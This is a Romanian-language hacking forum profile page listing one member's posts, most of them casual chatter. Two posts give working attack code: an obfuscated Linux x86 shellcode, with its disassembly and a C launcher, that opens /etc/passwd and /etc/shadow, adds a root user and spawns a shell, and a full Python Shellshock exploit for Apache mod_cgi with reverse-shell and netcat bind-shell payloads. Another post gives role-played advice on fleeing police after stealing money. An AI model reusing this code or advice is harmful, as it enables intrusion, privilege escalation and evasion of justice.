Jump to content

Kalashnikov.

Active Members
  • Posts

    456
  • Joined

  • Last visited

Everything posted by Kalashnikov.

  1. B?nuiesc c? e de ajuns autorul #Author: Ali Razmjoo .
  2. desigur #Title: Obfuscated Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh #length: 521 bytes #Date: 8 September 2018 #Author: Ali Razmjoo #tested On: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]
  3. /* #Title: Obfuscated Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh #length: 521 bytes #Date: 8 September 2018 #Author: Ali Razmjoo #tested On: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ] Ali Razmjoo , Ali.Razmjoo1994@Gmail.Com Thanks to Jonathan Salwan chmod('/etc/passwd',777) chmod('/etc/shadow',777) open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , close passwd setreuid() , execve('/bin/sh') root@user:~/Desktop/xpl# objdump -d f.o f.o: file format elf32-i386 Disassembly of section .text: 00000000 <_start>: 0: 31 c0 xor %eax,%eax 2: 31 db xor %ebx,%ebx 4: 31 c9 xor %ecx,%ecx 6: 31 d2 xor %edx,%edx 8: bb 59 45 4f 53 mov $0x534f4559,%ebx d: ba 33 36 38 37 mov $0x37383633,%edx 12: 31 d3 xor %edx,%ebx 14: 53 push %ebx 15: c1 eb 08 shr $0x8,%ebx 18: 53 push %ebx 19: bb 7a 46 59 45 mov $0x4559467a,%ebx 1e: ba 55 36 38 36 mov $0x36383655,%edx 23: 31 d3 xor %edx,%ebx 25: 53 push %ebx 26: bb 67 58 45 4e mov $0x4e455867,%ebx 2b: ba 48 3d 31 2d mov $0x2d313d48,%edx 30: 31 d3 xor %edx,%ebx 32: 53 push %ebx 33: 89 e3 mov %esp,%ebx 35: 68 41 41 ff 01 push $0x1ff4141 3a: 59 pop %ecx 3b: c1 e9 08 shr $0x8,%ecx 3e: c1 e9 08 shr $0x8,%ecx 41: 6a 0f push $0xf 43: 58 pop %eax 44: cd 80 int $0x80 46: bb 53 49 57 4a mov $0x4a574953,%ebx 4b: ba 39 2d 38 3d mov $0x3d382d39,%edx 50: 31 d3 xor %edx,%ebx 52: c1 eb 08 shr $0x8,%ebx 55: 53 push %ebx 56: bb 6d 47 45 58 mov $0x5845476d,%ebx 5b: ba 42 34 2d 39 mov $0x392d3442,%edx 60: 31 d3 xor %edx,%ebx 62: 53 push %ebx 63: bb 6e 54 49 57 mov $0x5749546e,%ebx 68: ba 41 31 3d 34 mov $0x343d3141,%edx 6d: 31 d3 xor %edx,%ebx 6f: 53 push %ebx 70: 89 e3 mov %esp,%ebx 72: 68 41 41 ff 01 push $0x1ff4141 77: 59 pop %ecx 78: c1 e9 08 shr $0x8,%ecx 7b: c1 e9 08 shr $0x8,%ecx 7e: 6a 0f push $0xf 80: 58 pop %eax 81: cd 80 int $0x80 83: bb 73 47 4e 51 mov $0x514e4773,%ebx 88: ba 32 34 39 35 mov $0x35393432,%edx 8d: 31 d3 xor %edx,%ebx 8f: c1 eb 08 shr $0x8,%ebx 92: 53 push %ebx 93: bb 59 44 56 44 mov $0x44564459,%ebx 98: ba 76 34 37 37 mov $0x37373476,%edx 9d: 31 d3 xor %edx,%ebx 9f: 53 push %ebx a0: bb 4e 58 59 51 mov $0x5159584e,%ebx a5: ba 61 3d 2d 32 mov $0x322d3d61,%edx aa: 31 d3 xor %edx,%ebx ac: 53 push %ebx ad: 89 e3 mov %esp,%ebx af: 68 41 41 01 04 push $0x4014141 b4: 59 pop %ecx b5: c1 e9 08 shr $0x8,%ecx b8: c1 e9 08 shr $0x8,%ecx bb: 6a 05 push $0x5 bd: 58 pop %eax be: cd 80 int $0x80 c0: 89 c3 mov %eax,%ebx c2: 6a 04 push $0x4 c4: 58 pop %eax c5: 68 41 73 68 0a push $0xa687341 ca: 59 pop %ecx cb: c1 e9 08 shr $0x8,%ecx ce: 51 push %ecx cf: b9 57 67 57 58 mov $0x58576757,%ecx d4: ba 39 48 35 39 mov $0x39354839,%edx d9: 31 d1 xor %edx,%ecx db: 51 push %ecx dc: b9 4e 64 5a 51 mov $0x515a644e,%ecx e1: ba 74 4b 38 38 mov $0x38384b74,%edx e6: 31 d1 xor %edx,%ecx e8: 51 push %ecx e9: b9 47 57 56 42 mov $0x42565747,%ecx ee: ba 35 38 39 36 mov $0x36393835,%edx f3: 31 d1 xor %edx,%ecx f5: 51 push %ecx f6: b9 61 70 51 4e mov $0x4e517061,%ecx fb: ba 2d 39 6b 61 mov $0x616b392d,%edx 100: 31 d1 xor %edx,%ecx 102: 51 push %ecx 103: b9 48 58 70 74 mov $0x74705848,%ecx 108: ba 72 68 4a 35 mov $0x354a6872,%edx 10d: 31 d1 xor %edx,%ecx 10f: 51 push %ecx 110: b9 76 45 56 46 mov $0x46564576,%ecx 115: ba 3d 6b 6c 76 mov $0x766c6b3d,%edx 11a: 31 d1 xor %edx,%ecx 11c: 51 push %ecx 11d: 68 66 77 55 57 push $0x57557766 122: 68 68 70 31 50 push $0x50317068 127: 68 7a 59 65 41 push $0x4165597a 12c: 68 41 61 41 51 push $0x51416141 131: 68 49 38 75 74 push $0x74753849 136: 68 50 4d 59 68 push $0x68594d50 13b: 68 54 42 74 7a push $0x7a744254 140: 68 51 2f 38 54 push $0x54382f51 145: 68 45 36 6d 67 push $0x676d3645 14a: 68 76 50 2e 73 push $0x732e5076 14f: 68 4e 58 52 37 push $0x3752584e 154: 68 39 4b 55 48 push $0x48554b39 159: 68 72 2f 59 42 push $0x42592f72 15e: 68 56 78 4b 47 push $0x474b7856 163: 68 39 55 66 5a push $0x5a665539 168: 68 46 56 6a 68 push $0x686a5646 16d: 68 46 63 38 79 push $0x79386346 172: 68 70 59 6a 71 push $0x716a5970 177: 68 77 69 53 68 push $0x68536977 17c: 68 6e 54 67 54 push $0x5467546e 181: 68 58 4d 69 37 push $0x37694d58 186: 68 2f 41 6e 24 push $0x246e412f 18b: 68 70 55 6e 4d push $0x4d6e5570 190: 68 24 36 24 6a push $0x6a243624 195: b9 73 61 74 67 mov $0x67746173,%ecx 19a: ba 32 2d 3d 5d mov $0x5d3d2d32,%edx 19f: 31 d1 xor %edx,%ecx 1a1: 51 push %ecx 1a2: 89 e1 mov %esp,%ecx 1a4: ba 41 41 41 7f mov $0x7f414141,%edx 1a9: c1 ea 08 shr $0x8,%edx 1ac: c1 ea 08 shr $0x8,%edx 1af: c1 ea 08 shr $0x8,%edx 1b2: cd 80 int $0x80 1b4: 31 c0 xor %eax,%eax 1b6: b0 46 mov $0x46,%al 1b8: 31 db xor %ebx,%ebx 1ba: 31 c9 xor %ecx,%ecx 1bc: cd 80 int $0x80 1be: 31 c0 xor %eax,%eax 1c0: b0 46 mov $0x46,%al 1c2: 31 db xor %ebx,%ebx 1c4: 31 c9 xor %ecx,%ecx 1c6: cd 80 int $0x80 1c8: 68 52 55 48 42 push $0x42485552 1cd: 68 52 51 49 43 push $0x43495152 1d2: b9 49 4b 59 77 mov $0x77594b49,%ecx 1d7: ba 66 38 31 35 mov $0x35313866,%edx 1dc: 31 d1 xor %edx,%ecx 1de: 51 push %ecx 1df: b9 55 55 54 57 mov $0x57545555,%ecx 1e4: ba 7a 37 3d 39 mov $0x393d377a,%edx 1e9: 31 d1 xor %edx,%ecx 1eb: 51 push %ecx 1ec: 89 e3 mov %esp,%ebx 1ee: 31 c0 xor %eax,%eax 1f0: 88 43 07 mov %al,0x7(%ebx) 1f3: 89 5b 08 mov %ebx,0x8(%ebx) 1f6: 89 43 0c mov %eax,0xc(%ebx) 1f9: b0 0b mov $0xb,%al 1fb: 8d 4b 08 lea 0x8(%ebx),%ecx 1fe: 8d 53 0c lea 0xc(%ebx),%edx 201: cd 80 int $0x80 203: b0 01 mov $0x1,%al 205: b3 01 mov $0x1,%bl 207: cd 80 int $0x80 root@user:~/Desktop/xpl# */ #include <stdio.h> #include <string.h> char sc[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xbb\x59\x45\x4f\x53\xba\x33\x36\x38\x37\x31\xd3\x53\xc1\xeb\x08\x53\xbb\x7a\x46\x59\x45\xba\x55\x36\x38\x36\x31\xd3\x53\xbb\x67\x58\x45\x4e\xba\x48\x3d\x31\x2d\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x53\x49\x57\x4a\xba\x39\x2d\x38\x3d\x31\xd3\xc1\xeb\x08\x53\xbb\x6d\x47\x45\x58\xba\x42\x34\x2d\x39\x31\xd3\x53\xbb\x6e\x54\x49\x57\xba\x41\x31\x3d\x34\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x73\x47\x4e\x51\xba\x32\x34\x39\x35\x31\xd3\xc1\xeb\x08\x53\xbb\x59\x44\x56\x44\xba\x76\x34\x37\x37\x31\xd3\x53\xbb\x4e\x58\x59\x51\xba\x61\x3d\x2d\x32\x31\xd3\x53\x89\xe3\x68\x41\x41\x01\x04\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x05\x58\xcd\x80\x89\xc3\x6a\x04\x58\x68\x41\x73\x68\x0a\x59\xc1\xe9\x08\x51\xb9\x57\x67\x57\x58\xba\x39\x48\x35\x39\x31\xd1\x51\xb9\x4e\x64\x5a\x51\xba\x74\x4b\x38\x38\x31\xd1\x51\xb9\x47\x57\x56\x42\xba\x35\x38\x39\x36\x31\xd1\x51\xb9\x61\x70\x51\x4e\xba\x2d\x39\x6b\x61\x31\xd1\x51\xb9\x48\x58\x70\x74\xba\x72\x68\x4a\x35\x31\xd1\x51\xb9\x76\x45\x56\x46\xba\x3d\x6b\x6c\x76\x31\xd1\x51\x68\x66\x77\x55\x57\x68\x68\x70\x31\x50\x68\x7a\x59\x65\x41\x68\x41\x61\x41\x51\x68\x49\x38\x75\x74\x68\x50\x4d\x59\x68\x68\x54\x42\x74\x7a\x68\x51\x2f\x38\x54\x68\x45\x36\x6d\x67\x68\x76\x50\x2e\x73\x68\x4e\x58\x52\x37\x68\x39\x4b\x55\x48\x68\x72\x2f\x59\x42\x68\x56\x78\x4b\x47\x68\x39\x55\x66\x5a\x68\x46\x56\x6a\x68\x68\x46\x63\x38\x79\x68\x70\x59\x6a\x71\x68\x77\x69\x53\x68\x68\x6e\x54\x67\x54\x68\x58\x4d\x69\x37\x68\x2f\x41\x6e\x24\x68\x70\x55\x6e\x4d\x68\x24\x36\x24\x6a\xb9\x73\x61\x74\x67\xba\x32\x2d\x3d\x5d\x31\xd1\x51\x89\xe1\xba\x41\x41\x41\x7f\xc1\xea\x08\xc1\xea\x08\xc1\xea\x08\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x52\x55\x48\x42\x68\x52\x51\x49\x43\xb9\x49\x4b\x59\x77\xba\x66\x38\x31\x35\x31\xd1\x51\xb9\x55\x55\x54\x57\xba\x7a\x37\x3d\x39\x31\xd1\x51\x89\xe3\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xb0\x01\xb3\x01\xcd\x80"; int main(void) { fprintf(stdout,"Length: %d\n\n",strlen(sc)); (*(void(*)()) sc)(); }
  4. #! /usr/bin/env python from socket import * from threading import Thread import thread, time, httplib, urllib, sys stop = False proxyhost = "" proxyport = 0 def usage(): print """ Shellshock apache mod_cgi remote exploit Usage: ./exploit.py var=<value> Vars: rhost: victim host rport: victim port for TCP shell binding lhost: attacker host for TCP shell reversing lport: attacker port for TCP shell reversing pages: specific cgi vulnerable pages (separated by comma) proxy: host:port proxy Payloads: "reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport) "bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport) Example: ./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234 ./exploit.py payload=bind rhost=1.2.3.4 rport=1234 Credits: Federico Galatolo 2014 """ sys.exit(0) def exploit(lhost,lport,rhost,rport,payload,pages): headers = {"Cookie": payload, "Referer": payload} for page in pages: if stop: return print "[-] Trying exploit on : "+page if proxyhost != "": c = httplib.HTTPConnection(proxyhost,proxyport) c.request("GET","http://"+rhost+page,headers=headers) res = c.getresponse() else: c = httplib.HTTPConnection(rhost) c.request("GET",page,headers=headers) res = c.getresponse() if res.status == 404: print "[*] 404 on : "+page time.sleep(1) args = {} for arg in sys.argv[1:]: ar = arg.split("=") args[ar[0]] = ar[1] try: args['payload'] except: usage() if args['payload'] == 'reverse': try: lhost = args['lhost'] lport = int(args['lport']) rhost = args['rhost'] payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &" except: usage() elif args['payload'] == 'bind': try: rhost = args['rhost'] rport = args['rport'] payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'" except: usage() else: print "[*] Unsupported payload" usage() try: pages = args['pages'].split(",") except: pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"] try: proxyhost,proxyport = args['proxy'].split(":") except: pass if args['payload'] == 'reverse': serversocket = socket(AF_INET, SOCK_STREAM) buff = 1024 addr = (lhost, lport) serversocket.bind(addr) serversocket.listen(10) print "[!] Started reverse shell handler" thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,)) if args['payload'] == 'bind': serversocket = socket(AF_INET, SOCK_STREAM) addr = (rhost,int(rport)) thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,)) buff = 1024 while True: if args['payload'] == 'reverse': clientsocket, clientaddr = serversocket.accept() print "[!] Successfully exploited" print "[!] Incoming connection from "+clientaddr[0] stop = True clientsocket.settimeout(3) while True: reply = raw_input(clientaddr[0]+"> ") clientsocket.sendall(reply+"\n") try: data = clientsocket.recv(buff) print data except: pass if args['payload'] == 'bind': try: serversocket = socket(AF_INET, SOCK_STREAM) time.sleep(1) serversocket.connect(addr) print "[!] Successfully exploited" print "[!] Connected to "+rhost stop = True serversocket.settimeout(3) while True: reply = raw_input(rhost+"> ") serversocket.sendall(reply+"\n") data = serversocket.recv(buff) print data except: pass
  5. https://forum.avast.com/index.php?topic=156118.0 )
  6. useless Am gasit si eu ceva root-uri pe afara, incercati si voi, se gasesc usor .
  7. M-ai mult de 200 lei nu as da pe asa ceva, depinde cum il vinzi si la cine il vinzi. Daca ai noroc si il dai la tigani, iei si 500 lei sau bataie si ramai si fara calculator (joking). off: https://www.youtube.com/watch?v=5MGprml6bng
  8. Pentru c? uni au uitat s? mai mearga ?i la cinema s?-?i scoat? ?i produc?torul bani de p? film. le: 31-03-2014, 05:29 PM ?tiu si eu asta, în mare parte pentru filme s-a dat mai mult în judecat? unu p? altu, la modu general se aplica si pentru jocuri acceasi chestie.
  9. Da, ati citit bine. Se pare ca noua versiune a sistemului de operare american are incorporat in cod un keylogger care inregistreaza tot ce fac utilizatorii. Pentru cei care nu stiu, un keylogger este un program care realizeaza o actiune de urmarire a activitatii pe care utilizatorul o efectueaza la nivelul PC-ului acestuia. Toata saptamana am discutat aici, la ArenaIT despre noua lansare a celor de la Microsoft in materie de sistem de operare, Windows 10. Am vazut care sunt principalele probleme/bug-uri/impresii formate de la doua zile de folosire a acestui OS. Dar astazi am primit o veste, care, cel putin pe mine, m-a cam pus la indoiala asupra securitatii datelor mele. Cati dintre noi am citit Terms of Service sau Privacy Policy inainte sa descarcam preview-ul pentru Windows 10. Probabil nimeni dintre noi, pentru ca majoritatea utilizatorilor (tind sa cred ca peste 95% dintre ei) au bifat casuta prin care-si exprima acordul si au mers la un pas urmator. Cine stie ce drepturi a dat Microsoftului prin bifarea acelei casute? Ei bine, probabil nimeni. Ce zice extrasul asta? Ca tu accepti ca prin Windows 10, ii dai acordul Microsoftului sa acceseze fisierele tale si sa-ti memoreze (ATENTIE): tastale pe care le apesi. Asta inseamna ca daca accesezi un fisier si scrii in el, Microsoft va avea acees la ceea ce scrii, dar si la datele despre document. Dar asta nu e tot. Microsoft si-a rezervat si dreptul de a avea acces la microfonul tau, adresele tale de mail, istoricul apelurilor si al SMS-urilor tale si tot asa… sursa: Windows 10 Tehnical Preview are un keylogger incorporat | Arena IT
  10. Dup? ce îl înve?i p? gratis ceva s? îi mai dai ?i un premiu ?
  11. YXN0YSBlIHBhcm9sYTogWkdWbVlXTmw= -> asta e parola: ZGVmYWNl -> deface , mai simplu de atat nu se putea
  12. Trimite-mi pe pm link cu fi?ierul torrent.
  13. salut reckon
  14. "Avand in vedere ca deja mi-au luat urma cei interpolu', probabil sunt oameni care te spioneaza, ti-au pus deja camere, iti asculta telefon. Probabil asta iti e soarta daca te bagi sa furi banii altor oameni. on: sa zicem ca probabil nu au cele de mai sus, te duci la un prieten cu hdd-ul, stergi tot, instalezi windows, criptezi iar toate datele de pe hdd, reformatezi si iti instalezi cs oricum nu ai ce sa faci, sigur au dovezi daca au mandat / vin sa te ia probabil cea mai usoara metoda este sa fugi intr-o tara care nu acorda tratate de extradare" scuzati de exprimarea la persoana 1, m-am pus in pielea personajului
  15. hint: hash + cheie
  16. trist.
  17. pentru un milion ? ne vedem la defcamp
  18. mersi, am luat 5 stick-uri, initial voiam sa iau 20, da am spus ca va las si voua, sa nu fiu asa de hamnisât
  19. sunt taxe de transport, sau ceva in + fata de ce e acolo?
  20. priveste partea proasta, daca eu stau la tara, nu stau toata ziua in fata la televizor sa aflu ca tre sa ma duc in oras sa-mi fac cacatu ala, iar un vecin e grav bolnav, eu ce cacat fac daca nu pot sa sun la ambulanta? pentru glumele facute la serviciul 112, ar trebui anulate cartelele / se gasesc alte solutii. // sper ca in 2016 sa fiu departe de romania
  21. Nici la vizitatori nu le place, sau cel putin mie nu imi place.
  22. e frumos site-ul, dar iti recomand sa nu mai faci copy-paste la prezentarile magazinelor / hotelurilor
  23. giz?s la host, scrie cumva Web hosting, domain names, VPS - 000webhost.com ?
  24. la ce va asteptati cand se foloseste internet explorer felicitari pentru proiect, dar, doar mie mi se pare dubios loginu ala ? @321 stati ma linistit, eram ironic + 321, poti sa imi dai mie pm cu sursa si in program sa pui ceva in plus
  25. Iti faci cu $1.000 un site de filme xxx (share, nu upload), $15 domeniu (com), webhosting $100, platesti oameni sa lucre (posteze video-uri), daca te pricei intreti tu site-ul, + design, platesti si pentru seo ceva oameni, si aia e, bani scoti din plugrush sau vinzi reclama.
×
×
  • Create New...